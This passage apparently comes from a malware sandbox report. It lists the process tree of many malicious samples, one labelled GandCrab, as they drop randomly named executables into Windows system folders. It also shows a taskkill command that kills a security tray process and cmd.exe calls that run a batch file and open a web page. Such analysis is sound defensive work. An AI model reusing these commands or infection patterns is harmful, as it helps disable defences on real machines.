- - C:\Users\Admin\Downloads\241002-yg5a1atcjk8d6784e2bdf54b61d172e493849cbcb1a7aae80f47ed286ac3e5d7b5dd520ff3N.exe
    C:\Users\Admin\Downloads\241002-yg5a1atcjk8d6784e2bdf54b61d172e493849cbcb1a7aae80f47ed286ac3e5d7b5dd520ff3N.exe
    3⤵
    PID:7752
- - C:\Users\Admin\Downloads\241002-xww3hawbna0c1ea56ee1e685586e1f1d17d8d7f7e8_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-xww3hawbna0c1ea56ee1e685586e1f1d17d8d7f7e8_JaffaCakes118.exe
    3⤵
    PID:7408
- - C:\Users\Admin\Downloads\241002-xrgr1svhld196f7d74a7072a95a800a15bead9786665c94b7770c06911a1a7d42ecf77f0a1.exe
    C:\Users\Admin\Downloads\241002-xrgr1svhld196f7d74a7072a95a800a15bead9786665c94b7770c06911a1a7d42ecf77f0a1.exe
    3⤵
    PID:7416
- - C:\Users\Admin\Downloads\241002-ygnm9axbma07399a4afc81c2a6dbadfb205141b35cb309b0cf435e8fe5cb340a04dc4d3177N.exe
    C:\Users\Admin\Downloads\241002-ygnm9axbma07399a4afc81c2a6dbadfb205141b35cb309b0cf435e8fe5cb340a04dc4d3177N.exe
    3⤵
    PID:3424
  - - C:\Windows\SysWOW64\Lfeljd32.exe
      C:\Windows\system32\Lfeljd32.exe
      4⤵
      PID:10952
    - - C:\Windows\SysWOW64\Pnmopk32.exe
        
        C:\Windows\system32\Pnmopk32.exe
        5⤵
        
        PID:10232
      - C:\Windows\SysWOW64\Mcoljagj.exe
        
        C:\Windows\system32\Mcoljagj.exe
        6⤵
        
        PID:12588
        
        C:\Windows\SysWOW64\Qikbaaml.exe
        
        C:\Windows\system32\Qikbaaml.exe
        7⤵
        
        PID:9548
        
        C:\Windows\SysWOW64\Kkpnga32.exe
        
        C:\Windows\system32\Kkpnga32.exe
        8⤵
        
        PID:10532
        
        C:\Windows\SysWOW64\Pbimjb32.exe
        
        C:\Windows\system32\Pbimjb32.exe
        9⤵
        
        PID:1000
- - C:\Users\Admin\Downloads\241002-x3662swenb791cc5376611f915ae5000867c2635818c6fdcbf4a7c83dca6e68e634d65b79bN.exe
    C:\Users\Admin\Downloads\241002-x3662swenb791cc5376611f915ae5000867c2635818c6fdcbf4a7c83dca6e68e634d65b79bN.exe
    3⤵
    PID:7960
- - C:\Users\Admin\Downloads\241002-x4feqawepdc02244063470e63bf907b3d93bef49393ec7a0c0e172e47bc7d3f5b3b467e0cdN.exe
    C:\Users\Admin\Downloads\241002-x4feqawepdc02244063470e63bf907b3d93bef49393ec7a0c0e172e47bc7d3f5b3b467e0cdN.exe
    3⤵
    PID:7092
- - C:\Users\Admin\Downloads\241002-xn3kbavgjd0c139fc12173e4f966ffc54e2725424d_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-xn3kbavgjd0c139fc12173e4f966ffc54e2725424d_JaffaCakes118.exe
    3⤵
    PID:8040
- - C:\Users\Admin\Downloads\241002-x8ptyswgka7c57e080fad66909a105177a14c3e3dadef0cbf3ac40b97f7d6634683cddc94fN.exe
    C:\Users\Admin\Downloads\241002-x8ptyswgka7c57e080fad66909a105177a14c3e3dadef0cbf3ac40b97f7d6634683cddc94fN.exe
    3⤵
    PID:7012
- - C:\Users\Admin\Downloads\241002-yey17sxapg0c35f25e38a759ba16e66679daae397a_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-yey17sxapg0c35f25e38a759ba16e66679daae397a_JaffaCakes118.exe
    3⤵
    PID:8072
- - C:\Users\Admin\Downloads\241002-xyc3eawcla0479d42c34729b3ee7ad729ec25250c6c385bbc22a76489d2533e2607998559a.exe
    C:\Users\Admin\Downloads\241002-xyc3eawcla0479d42c34729b3ee7ad729ec25250c6c385bbc22a76489d2533e2607998559a.exe
    3⤵
    PID:8108
- - C:\Users\Admin\Downloads\241002-xp2z6s1hkpc1eb65d6167aa276a487f41766afe75c3bf51f9fc697a005524da8189660f5a1.exe
    C:\Users\Admin\Downloads\241002-xp2z6s1hkpc1eb65d6167aa276a487f41766afe75c3bf51f9fc697a005524da8189660f5a1.exe
    3⤵
    PID:6084
  - - C:\Windows\System\KooxPgu.exe
      C:\Windows\System\KooxPgu.exe
      4⤵
      PID:10560
  - - C:\Windows\System\qmfOsKt.exe
      C:\Windows\System\qmfOsKt.exe
      4⤵
      PID:12104
  - - C:\Windows\System\SQUfCgQ.exe
      C:\Windows\System\SQUfCgQ.exe
      4⤵
      PID:11344
  - - C:\Windows\System\xBkryos.exe
      C:\Windows\System\xBkryos.exe
      4⤵
      PID:12484
  - - C:\Windows\System\jIbcOUs.exe
      C:\Windows\System\jIbcOUs.exe
      4⤵
      PID:14020
  - - C:\Windows\System\QCzCtTY.exe
      C:\Windows\System\QCzCtTY.exe
      4⤵
      PID:6368
  - - C:\Windows\System\hCzFeET.exe
      C:\Windows\System\hCzFeET.exe
      4⤵
      PID:15300
  - - C:\Windows\System\XcPmvOM.exe
      C:\Windows\System\XcPmvOM.exe
      4⤵
      PID:8776
  - - C:\Windows\System\ZFafFnU.exe
      C:\Windows\System\ZFafFnU.exe
      4⤵
      PID:16176
  - - C:\Windows\System\JZXSAEj.exe
      C:\Windows\System\JZXSAEj.exe
      4⤵
      PID:13844
  - - C:\Windows\System\ydIDZIY.exe
      C:\Windows\System\ydIDZIY.exe
      4⤵
      PID:17912
  - - C:\Windows\System\WwGfGvZ.exe
      C:\Windows\System\WwGfGvZ.exe
      4⤵
      PID:5308
  - - C:\Windows\System\aHRevZx.exe
      C:\Windows\System\aHRevZx.exe
      4⤵
      PID:8724
  - - C:\Windows\System\cWfuccY.exe
      C:\Windows\System\cWfuccY.exe
      4⤵
      PID:12864
  - - C:\Windows\System\FxCNgRm.exe
      C:\Windows\System\FxCNgRm.exe
      4⤵
      PID:12388
  - - C:\Windows\System\tzveccA.exe
      C:\Windows\System\tzveccA.exe
      4⤵
      PID:12248
  - - C:\Windows\System\CAVxXvq.exe
      C:\Windows\System\CAVxXvq.exe
      4⤵
      PID:2060
  - - C:\Windows\System\XDeRbIN.exe
      C:\Windows\System\XDeRbIN.exe
      4⤵
      PID:13384
  - - C:\Windows\System\zwEJRlY.exe
      C:\Windows\System\zwEJRlY.exe
      4⤵
      PID:8624
  - - C:\Windows\System\CTcwAuM.exe
      C:\Windows\System\CTcwAuM.exe
      4⤵
      PID:14584
  - - C:\Windows\System\OVxORRz.exe
      C:\Windows\System\OVxORRz.exe
      4⤵
      PID:8280
  - - C:\Windows\System\rhVoPid.exe
      C:\Windows\System\rhVoPid.exe
      4⤵
      PID:14348
  - - C:\Windows\System\RPqvQIC.exe
      C:\Windows\System\RPqvQIC.exe
      4⤵
      PID:14784
  - - C:\Windows\System\xYDrXGs.exe
      C:\Windows\System\xYDrXGs.exe
      4⤵
      PID:13460
  - - C:\Windows\System\sKIVGFN.exe
      C:\Windows\System\sKIVGFN.exe
      4⤵
      PID:2612
  - - C:\Windows\System\PxvKOje.exe
      C:\Windows\System\PxvKOje.exe
      4⤵
      PID:16676
  - - C:\Windows\System\kymGiDi.exe
      C:\Windows\System\kymGiDi.exe
      4⤵
      PID:16692
  - - C:\Windows\System\rGGHtmr.exe
      C:\Windows\System\rGGHtmr.exe
      4⤵
      PID:15288
  - - C:\Windows\System\WzeIcDO.exe
      C:\Windows\System\WzeIcDO.exe
      4⤵
      PID:18344
  - - C:\Windows\System\rNZpAed.exe
      C:\Windows\System\rNZpAed.exe
      4⤵
      PID:3024
  - - C:\Windows\System\IYQlwVh.exe
      C:\Windows\System\IYQlwVh.exe
      4⤵
      PID:6292
  - - C:\Windows\System\YrpoVyK.exe
      C:\Windows\System\YrpoVyK.exe
      4⤵
      PID:17644
  - - C:\Windows\System\plFAbeo.exe
      C:\Windows\System\plFAbeo.exe
      4⤵
      PID:16472
  - - C:\Windows\System\IUHiuyh.exe
      C:\Windows\System\IUHiuyh.exe
      4⤵
      PID:18172
  - - C:\Windows\System\jyyFuxl.exe
      C:\Windows\System\jyyFuxl.exe
      4⤵
      PID:6580
  - - C:\Windows\System\AkiSJLw.exe
      C:\Windows\System\AkiSJLw.exe
      4⤵
      PID:4188
  - - C:\Windows\System\ZLzvwJz.exe
      C:\Windows\System\ZLzvwJz.exe
      4⤵
      PID:18284
  - - C:\Windows\System\XTsQEIb.exe
      C:\Windows\System\XTsQEIb.exe
      4⤵
      PID:6232
  - - C:\Windows\System\XRFCTBJ.exe
      C:\Windows\System\XRFCTBJ.exe
      4⤵
      PID:7636
  - - C:\Windows\System\QXqyvOt.exe
      C:\Windows\System\QXqyvOt.exe
      4⤵
      PID:15608
  - - C:\Windows\System\JZSDagx.exe
      C:\Windows\System\JZSDagx.exe
      4⤵
      PID:4088
  - - C:\Windows\System\ALSdouN.exe
      C:\Windows\System\ALSdouN.exe
      4⤵
      PID:8296
  - - C:\Windows\System\QkPgMRt.exe
      C:\Windows\System\QkPgMRt.exe
      4⤵
      PID:16764
  - - C:\Windows\System\xOZGKTH.exe
      C:\Windows\System\xOZGKTH.exe
      4⤵
      PID:18388
  - - C:\Windows\System\XrSJWWH.exe
      C:\Windows\System\XrSJWWH.exe
      4⤵
      PID:16928
  - - C:\Windows\System\nnCPHtG.exe
      C:\Windows\System\nnCPHtG.exe
      4⤵
      PID:17312
  - - C:\Windows\System\KkIhveZ.exe
      C:\Windows\System\KkIhveZ.exe
      4⤵
      PID:8088
  - - C:\Windows\System\kDIeYhe.exe
      C:\Windows\System\kDIeYhe.exe
      4⤵
      PID:4696
  - - C:\Windows\System\DRFnUyw.exe
      C:\Windows\System\DRFnUyw.exe
      4⤵
      PID:4744
  - - C:\Windows\System\KXetSYf.exe
      C:\Windows\System\KXetSYf.exe
      4⤵
      PID:4212
  - - C:\Windows\System\aIjMqXn.exe
      C:\Windows\System\aIjMqXn.exe
      4⤵
      PID:8580
  - - C:\Windows\System\ityvZIx.exe
      C:\Windows\System\ityvZIx.exe
      4⤵
      PID:4940
  - - C:\Windows\System\jXBHuLv.exe
      C:\Windows\System\jXBHuLv.exe
      4⤵
      PID:7312
  - - C:\Windows\System\MFomblB.exe
      C:\Windows\System\MFomblB.exe
      4⤵
      PID:12800
  - - C:\Windows\System\JYXmWNi.exe
      C:\Windows\System\JYXmWNi.exe
      4⤵
      PID:14016
  - - C:\Windows\System\KEtvfeW.exe
      C:\Windows\System\KEtvfeW.exe
      4⤵
      PID:8732
  - - C:\Windows\System\ElwJKPA.exe
      C:\Windows\System\ElwJKPA.exe
      4⤵
      PID:10460
  - - C:\Windows\System\FZlGBxz.exe
      C:\Windows\System\FZlGBxz.exe
      4⤵
      PID:12708
  - - C:\Windows\System\BiQkXkC.exe
      C:\Windows\System\BiQkXkC.exe
      4⤵
      PID:11468
  - - C:\Windows\System\TDrbAor.exe
      C:\Windows\System\TDrbAor.exe
      4⤵
      PID:8036
  - - C:\Windows\System\YQnXzAO.exe
      C:\Windows\System\YQnXzAO.exe
      4⤵
      PID:5180
  - - C:\Windows\System\wnGUoTk.exe
      C:\Windows\System\wnGUoTk.exe
      4⤵
      PID:13076
  - - C:\Windows\System\CatsLwQ.exe
      C:\Windows\System\CatsLwQ.exe
      4⤵
      PID:14144
  - - C:\Windows\System\HSdRlNl.exe
      C:\Windows\System\HSdRlNl.exe
      4⤵
      PID:7808
  - - C:\Windows\System\AqYDfzn.exe
      C:\Windows\System\AqYDfzn.exe
      4⤵
      PID:16824
  - - C:\Windows\System\eeYfyuY.exe
      C:\Windows\System\eeYfyuY.exe
      4⤵
      PID:16840
  - - C:\Windows\System\fAkgjzt.exe
      C:\Windows\System\fAkgjzt.exe
      4⤵
      PID:13704
  - - C:\Windows\System\GNTdzaN.exe
      C:\Windows\System\GNTdzaN.exe
      4⤵
      PID:320
  - - C:\Windows\System\wlYGqlF.exe
      C:\Windows\System\wlYGqlF.exe
      4⤵
      PID:2152
  - - C:\Windows\System\rHEXWNk.exe
      C:\Windows\System\rHEXWNk.exe
      4⤵
      PID:7476
  - - C:\Windows\System\lzlytkc.exe
      C:\Windows\System\lzlytkc.exe
      4⤵
      PID:11924
  - - C:\Windows\System\pXXZHxf.exe
      C:\Windows\System\pXXZHxf.exe
      4⤵
      PID:13792
  - - C:\Windows\System\KpAIXZA.exe
      C:\Windows\System\KpAIXZA.exe
      4⤵
      PID:4216
  - - C:\Windows\System\DBbOPBP.exe
      C:\Windows\System\DBbOPBP.exe
      4⤵
      PID:8044
  - - C:\Windows\System\cyyRfJw.exe
      C:\Windows\System\cyyRfJw.exe
      4⤵
      PID:15992
  - - C:\Windows\System\YHOWkRM.exe
      C:\Windows\System\YHOWkRM.exe
      4⤵
      PID:5664
  - - C:\Windows\System\vjTVHkt.exe
      C:\Windows\System\vjTVHkt.exe
      4⤵
      PID:16404
  - - C:\Windows\System\MjAJake.exe
      C:\Windows\System\MjAJake.exe
      4⤵
      PID:17720
  - - C:\Windows\System\olffydY.exe
      C:\Windows\System\olffydY.exe
      4⤵
      PID:17380
  - - C:\Windows\System\PMbsyEg.exe
      C:\Windows\System\PMbsyEg.exe
      4⤵
      PID:15792
  - - C:\Windows\System\eDpcLnZ.exe
      C:\Windows\System\eDpcLnZ.exe
      4⤵
      PID:17904
  - - C:\Windows\System\zlyPPdK.exe
      C:\Windows\System\zlyPPdK.exe
      4⤵
      PID:12188
  - - C:\Windows\System\WrhuaPz.exe
      C:\Windows\System\WrhuaPz.exe
      4⤵
      PID:10172
  - - C:\Windows\System\dZRFmzJ.exe
      C:\Windows\System\dZRFmzJ.exe
      4⤵
      PID:9192
  - - C:\Windows\System\dtjuiao.exe
      C:\Windows\System\dtjuiao.exe
      4⤵
      PID:6852
  - - C:\Windows\System\POxSEVj.exe
      C:\Windows\System\POxSEVj.exe
      4⤵
      PID:700
  - - C:\Windows\System\XlUCzqX.exe
      C:\Windows\System\XlUCzqX.exe
      4⤵
      PID:6668
  - - C:\Windows\System\HvwsFKI.exe
      C:\Windows\System\HvwsFKI.exe
      4⤵
      PID:4180
  - - C:\Windows\System\HmSVMEj.exe
      C:\Windows\System\HmSVMEj.exe
      4⤵
      PID:10584
  - - C:\Windows\System\tnihInf.exe
      C:\Windows\System\tnihInf.exe
      4⤵
      PID:2492
  - - C:\Windows\System\DwUHHDL.exe
      C:\Windows\System\DwUHHDL.exe
      4⤵
      PID:13232
  - - C:\Windows\System\MtbwoGy.exe
      C:\Windows\System\MtbwoGy.exe
      4⤵
      PID:3012
  - - C:\Windows\System\aYLYyXH.exe
      C:\Windows\System\aYLYyXH.exe
      4⤵
      PID:5760
  - - C:\Windows\System\JDaraUK.exe
      C:\Windows\System\JDaraUK.exe
      4⤵
      PID:14388
  - - C:\Windows\System\FwdslGx.exe
      C:\Windows\System\FwdslGx.exe
      4⤵
      PID:5676
  - - C:\Windows\System\wYmGEGC.exe
      C:\Windows\System\wYmGEGC.exe
      4⤵
      PID:9736
  - - C:\Windows\System\sjGmRYP.exe
      C:\Windows\System\sjGmRYP.exe
      4⤵
      PID:13664
  - - C:\Windows\System\mAbVvrb.exe
      C:\Windows\System\mAbVvrb.exe
      4⤵
      PID:12568
  - - C:\Windows\System\aKAsmoY.exe
      C:\Windows\System\aKAsmoY.exe
      4⤵
      PID:18052
  - - C:\Windows\System\tabRvkb.exe
      C:\Windows\System\tabRvkb.exe
      4⤵
      PID:16888
  - - C:\Windows\System\FZtJtAi.exe
      C:\Windows\System\FZtJtAi.exe
      4⤵
      PID:16356
  - - C:\Windows\System\vfuWTKl.exe
      C:\Windows\System\vfuWTKl.exe
      4⤵
      PID:9496
  - - C:\Windows\System\xGKRAmv.exe
      C:\Windows\System\xGKRAmv.exe
      4⤵
      PID:4580
  - - C:\Windows\System\QJjPuZG.exe
      C:\Windows\System\QJjPuZG.exe
      4⤵
      PID:14840
  - - C:\Windows\System\UVOqXvc.exe
      C:\Windows\System\UVOqXvc.exe
      4⤵
      PID:14500
  - - C:\Windows\System\JkqprJZ.exe
      C:\Windows\System\JkqprJZ.exe
      4⤵
      PID:6612
  - - C:\Windows\System\JqSGuRq.exe
      C:\Windows\System\JqSGuRq.exe
      4⤵
      PID:17712
  - - C:\Windows\System\GhJQIre.exe
      C:\Windows\System\GhJQIre.exe
      4⤵
      PID:16056
  - - C:\Windows\System\tLCiMqm.exe
      C:\Windows\System\tLCiMqm.exe
      4⤵
      PID:1464
  - - C:\Windows\System\eoydobA.exe
      C:\Windows\System\eoydobA.exe
      4⤵
      PID:2560
  - - C:\Windows\System\WmHsWGS.exe
      C:\Windows\System\WmHsWGS.exe
      4⤵
      PID:11148
  - - C:\Windows\System\VaQEmzP.exe
      C:\Windows\System\VaQEmzP.exe
      4⤵
      PID:11568
  - - C:\Windows\System\PyGPuNB.exe
      C:\Windows\System\PyGPuNB.exe
      4⤵
      PID:384
  - - C:\Windows\System\AwMBktu.exe
      C:\Windows\System\AwMBktu.exe
      4⤵
      PID:2064
  - - C:\Windows\System\KWWLupJ.exe
      C:\Windows\System\KWWLupJ.exe
      4⤵
      PID:7388
  - - C:\Windows\System\LKBJJsA.exe
      C:\Windows\System\LKBJJsA.exe
      4⤵
      PID:17296
  - - C:\Windows\System\mJnmZDN.exe
      C:\Windows\System\mJnmZDN.exe
      4⤵
      PID:16704
  - - C:\Windows\System\FpxJKTd.exe
      C:\Windows\System\FpxJKTd.exe
      4⤵
      PID:16744
  - - C:\Windows\System\hWVQdLe.exe
      C:\Windows\System\hWVQdLe.exe
      4⤵
      PID:17856
  - - C:\Windows\System\KipdzSd.exe
      C:\Windows\System\KipdzSd.exe
      4⤵
      PID:17832
  - - C:\Windows\System\OOyzYYH.exe
      C:\Windows\System\OOyzYYH.exe
      4⤵
      PID:904
  - - C:\Windows\System\LrkNMjW.exe
      C:\Windows\System\LrkNMjW.exe
      4⤵
      PID:11764
  - - C:\Windows\System\AqqhBGB.exe
      C:\Windows\System\AqqhBGB.exe
      4⤵
      PID:17460
  - - C:\Windows\System\KznfHBm.exe
      C:\Windows\System\KznfHBm.exe
      4⤵
      PID:13640
  - - C:\Windows\System\CxBlskV.exe
      C:\Windows\System\CxBlskV.exe
      4⤵
      PID:14008
  - - C:\Windows\System\dCLpSjQ.exe
      C:\Windows\System\dCLpSjQ.exe
      4⤵
      PID:5228
  - - C:\Windows\System\kEnRmhv.exe
      C:\Windows\System\kEnRmhv.exe
      4⤵
      PID:3308
  - - C:\Windows\System\nduQsji.exe
      C:\Windows\System\nduQsji.exe
      4⤵
      PID:17088
  - - C:\Windows\System\kSzGaQU.exe
      C:\Windows\System\kSzGaQU.exe
      4⤵
      PID:1240
  - - C:\Windows\System\luWbVjK.exe
      C:\Windows\System\luWbVjK.exe
      4⤵
      PID:8636
  - - C:\Windows\System\HXJZSKj.exe
      C:\Windows\System\HXJZSKj.exe
      4⤵
      PID:16712
  - - C:\Windows\System\AiBhHWX.exe
      C:\Windows\System\AiBhHWX.exe
      4⤵
      PID:10940
  - - C:\Windows\System\MopJgTZ.exe
      C:\Windows\System\MopJgTZ.exe
      4⤵
      PID:10032
  - - C:\Windows\System\HtyBGmY.exe
      C:\Windows\System\HtyBGmY.exe
      4⤵
      PID:13712
  - - C:\Windows\System\Nclcqae.exe
      C:\Windows\System\Nclcqae.exe
      4⤵
      PID:10612
  - - C:\Windows\System\roLvTUI.exe
      C:\Windows\System\roLvTUI.exe
      4⤵
      PID:5480
  - - C:\Windows\System\QJciYpr.exe
      C:\Windows\System\QJciYpr.exe
      4⤵
      PID:14580
  - - C:\Windows\System\MfAOanB.exe
      C:\Windows\System\MfAOanB.exe
      4⤵
      PID:3268
  - - C:\Windows\System\ddFrqYu.exe
      C:\Windows\System\ddFrqYu.exe
      4⤵
      PID:13056
  - - C:\Windows\System\EZdmlDg.exe
      C:\Windows\System\EZdmlDg.exe
      4⤵
      PID:8944
  - - C:\Windows\System\CjOfAvv.exe
      C:\Windows\System\CjOfAvv.exe
      4⤵
      PID:11968
  - - C:\Windows\System\ppbenXv.exe
      C:\Windows\System\ppbenXv.exe
      4⤵
      PID:15776
  - - C:\Windows\System\RRDvzZq.exe
      C:\Windows\System\RRDvzZq.exe
      4⤵
      PID:2016
  - - C:\Windows\System\zATSdIz.exe
      C:\Windows\System\zATSdIz.exe
      4⤵
      PID:5628
  - - C:\Windows\System\PTDlFYU.exe
      C:\Windows\System\PTDlFYU.exe
      4⤵
      PID:11192
  - - C:\Windows\System\yYehlbA.exe
      C:\Windows\System\yYehlbA.exe
      4⤵
      PID:7544
- - C:\Users\Admin\Downloads\241002-xqntyavgrd68256aaa84c915a46783c29514848361deb500c8724336b8a35b9286cfdaa398N.exe
    C:\Users\Admin\Downloads\241002-xqntyavgrd68256aaa84c915a46783c29514848361deb500c8724336b8a35b9286cfdaa398N.exe
    3⤵
    PID:8684
  - - \??\c:\xrxlfxl.exe
      c:\xrxlfxl.exe
      4⤵
      PID:10892
    - - \??\c:\rrrlllf.exe
        
        c:\rrrlllf.exe
        5⤵
        
        PID:10796
      - \??\c:\nbnhtn.exe
        
        c:\nbnhtn.exe
        6⤵
        
        PID:12768
        
        \??\c:\flllffx.exe
        
        c:\flllffx.exe
        7⤵
        
        PID:10308
        
        \??\c:\xlllllf.exe
        
        c:\xlllllf.exe
        8⤵
        
        PID:5092
        
        \??\c:\rfrlfff.exe
        
        c:\rfrlfff.exe
        9⤵
        
        PID:3632
        
        \??\c:\7thbtb.exe
        
        c:\7thbtb.exe
        10⤵
        
        PID:12544
- - C:\Users\Admin\Downloads\241002-yan1fashnj78804133eaf7d6848cd5cef2f5c6edf8a138771464a0de2ec1b64be4c7b3bb18N.exe
    C:\Users\Admin\Downloads\241002-yan1fashnj78804133eaf7d6848cd5cef2f5c6edf8a138771464a0de2ec1b64be4c7b3bb18N.exe
    3⤵
    PID:4572
  - - C:\Windows\SysWOW64\Ljnlecmp.exe
      C:\Windows\system32\Ljnlecmp.exe
      4⤵
      PID:10872
- - C:\Users\Admin\Downloads\241002-x7tfrasglk0c2b1eeac25a832ce077154cf58b8ffd_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-x7tfrasglk0c2b1eeac25a832ce077154cf58b8ffd_JaffaCakes118.exe
    3⤵
    PID:1396
- - C:\Users\Admin\Downloads\241002-xmervs1gkn0c115f5aa8fb2fe8ba6a7e15f5d96ef6_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-xmervs1gkn0c115f5aa8fb2fe8ba6a7e15f5d96ef6_JaffaCakes118.exe
    3⤵
    PID:5056
- - C:\Users\Admin\Downloads\241002-xyt1xswcmha28148892336f749a23e4df72e9c3f72b3da7ec56b25efd496b63748871a4b60N.exe
    C:\Users\Admin\Downloads\241002-xyt1xswcmha28148892336f749a23e4df72e9c3f72b3da7ec56b25efd496b63748871a4b60N.exe
    3⤵
    PID:9220
  - - C:\Windows\SysWOW64\Loighj32.exe
      C:\Windows\system32\Loighj32.exe
      4⤵
      PID:10832
    - - C:\Windows\SysWOW64\Chnlgjlb.exe
        
        C:\Windows\system32\Chnlgjlb.exe
        5⤵
        
        PID:10868
      - C:\Windows\SysWOW64\Mfnhfm32.exe
        
        C:\Windows\system32\Mfnhfm32.exe
        6⤵
        
        PID:12832
        
        C:\Windows\SysWOW64\Khkdad32.exe
        
        C:\Windows\system32\Khkdad32.exe
        7⤵
        
        PID:8972
        
        C:\Windows\SysWOW64\Jeneidji.exe
        
        C:\Windows\system32\Jeneidji.exe
        8⤵
        
        PID:7220
        
        C:\Windows\SysWOW64\Ebeapc32.exe
        
        C:\Windows\system32\Ebeapc32.exe
        9⤵
        
        PID:16448
- - C:\Users\Admin\Downloads\241002-xmtwsa1gmn65aef5e5d84d7bc31b9c5ca681b687bccd7a0f3d5fd3dc166248a7a90410ce1fN.exe
    C:\Users\Admin\Downloads\241002-xmtwsa1gmn65aef5e5d84d7bc31b9c5ca681b687bccd7a0f3d5fd3dc166248a7a90410ce1fN.exe
    3⤵
    PID:9228
  - - C:\Windows\SysWOW64\rmass.exe
      "C:\Windows\system32\rmass.exe"
      4⤵
      PID:10824
    - - C:\Windows\SysWOW64\rmass.exe
        
        --k33p
        5⤵
        
        PID:8356
- - C:\Users\Admin\Downloads\241002-xn2b9avgjb0c139defa5990ce3c483bd9766175a58_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-xn2b9avgjb0c139defa5990ce3c483bd9766175a58_JaffaCakes118.exe
    3⤵
    PID:9236
- - C:\Users\Admin\Downloads\241002-x8lsaswgje8255e2d4929a77203721d93e3945e5cbf1fcaf3c2fe052b7cd18a5e0846e0dfe.exe
    C:\Users\Admin\Downloads\241002-x8lsaswgje8255e2d4929a77203721d93e3945e5cbf1fcaf3c2fe052b7cd18a5e0846e0dfe.exe
    3⤵
    PID:9244
- - C:\Users\Admin\Downloads\241002-xp6ncsvgpb0c15534d5e273d980db582dfba91ca5a_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-xp6ncsvgpb0c15534d5e273d980db582dfba91ca5a_JaffaCakes118.exe
    3⤵
    PID:9252
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 9252 -s 376
      4⤵
      Program crash
      PID:11136
- - C:\Users\Admin\Downloads\241002-xremnavhlb0c17cdcf379d879006178d70d680bbe6_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-xremnavhlb0c17cdcf379d879006178d70d680bbe6_JaffaCakes118.exe
    3⤵
    PID:9260
- - C:\Users\Admin\Downloads\241002-xrxs8svhnb418641f2f47f67553de90e83a32e2f91f34d3c25d6df41b92e23663aa35b7a42N.exe
    C:\Users\Admin\Downloads\241002-xrxs8svhnb418641f2f47f67553de90e83a32e2f91f34d3c25d6df41b92e23663aa35b7a42N.exe
    3⤵
    PID:9268
  - - C:\Windows\SysWOW64\Kgnbdh32.exe
      C:\Windows\system32\Kgnbdh32.exe
      4⤵
      PID:10752
- - C:\Users\Admin\Downloads\241002-xr9g2avhpf0c195104debbc0c933d47a57a3f590db_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-xr9g2avhpf0c195104debbc0c933d47a57a3f590db_JaffaCakes118.exe
    3⤵
    PID:9276
  - - C:\Windows\SysWOW64\cmd.exe
      /c start http://www.xxxstash.com
      4⤵
      PID:12200
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Media\rdb.bat
      4⤵
      PID:10004
- - C:\Users\Admin\Downloads\241002-xy22jawcnh2024-10-02_d5687a1aec1991d7c011f41c1de5c03c_gandcrab.exe
    C:\Users\Admin\Downloads\241002-xy22jawcnh2024-10-02_d5687a1aec1991d7c011f41c1de5c03c_gandcrab.exe
    3⤵
    PID:9284
- - C:\Users\Admin\Downloads\241002-xmgapavfjg646f6842abf75cb88d86edf0e1ba8915c7e6d05445c763ff388a67336f1a004dN.exe
    C:\Users\Admin\Downloads\241002-xmgapavfjg646f6842abf75cb88d86edf0e1ba8915c7e6d05445c763ff388a67336f1a004dN.exe
    3⤵
    PID:9292
- - C:\Users\Admin\Downloads\241002-x8hqmswgjb0c2c15903976413f4172739d9eade43c_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-x8hqmswgjb0c2c15903976413f4172739d9eade43c_JaffaCakes118.exe
    3⤵
    PID:9300
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /t /im RSTray.exe
      4⤵
      Kills process with taskkill
      PID:10712
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 9300 -s 288
      4⤵
      Program crash
      PID:13504
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 9300 -s 288
      4⤵
      Program crash
      PID:3080
- - C:\Users\Admin\Downloads\241002-xz4azssdpjb12b6b7d25ba08779c14160bad19eda9e8318058a70723b9ed5869cd02dd1cd1.exe
    C:\Users\Admin\Downloads\241002-xz4azssdpjb12b6b7d25ba08779c14160bad19eda9e8318058a70723b9ed5869cd02dd1cd1.exe
    3⤵
    PID:9308
  - - \??\c:\lfxrlxx.exe
      c:\lfxrlxx.exe
      4⤵
      PID:12276
    - - \??\c:\dvvdv.exe
        
        c:\dvvdv.exe
        5⤵
        
        PID:8564
      - \??\c:\rrxfrrl.exe
        
        c:\rrxfrrl.exe
        6⤵
        
        PID:10916
        
        \??\c:\xllfxrf.exe
        
        c:\xllfxrf.exe
        7⤵
        
        PID:14568
        
        \??\c:\5ddvj.exe
        
        c:\5ddvj.exe
        8⤵
        
        PID:16372
        
        \??\c:\dvjdd.exe
        
        c:\dvjdd.exe
        9⤵
        
        PID:16560
        
        \??\c:\lllrrrl.exe
        
        c:\lllrrrl.exe
        10⤵
        
        PID:14324
        
        \??\c:\nhnhbt.exe
        
        c:\nhnhbt.exe
        11⤵
        
        PID:10204
- - C:\Users\Admin\Downloads\241002-xrhdjsvhlf68d9aa433bbb7ddfb7297524089b1550b1a60e7e46bd2c254f0633b3b485142b.exe
    C:\Users\Admin\Downloads\241002-xrhdjsvhlf68d9aa433bbb7ddfb7297524089b1550b1a60e7e46bd2c254f0633b3b485142b.exe
    3⤵
    PID:9316
- - C:\Users\Admin\Downloads\241002-yclyvswhpe0c32739315ed76a73f21326f4e2d18c6_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-yclyvswhpe0c32739315ed76a73f21326f4e2d18c6_JaffaCakes118.exe
    3⤵
    PID:9324
  - - C:\Windows\SysWOW64\ntdbg.exe
      C:\Windows\system32\ntdbg.exe C:\Windows\explorer.exe
      4⤵
      PID:6648
    - - C:\Windows\SysWOW64\ntdbg.exe
        
        C:\Windows\system32\ntdbg.exe C:\Windows\explorer.exe
        5⤵
        
        PID:2468
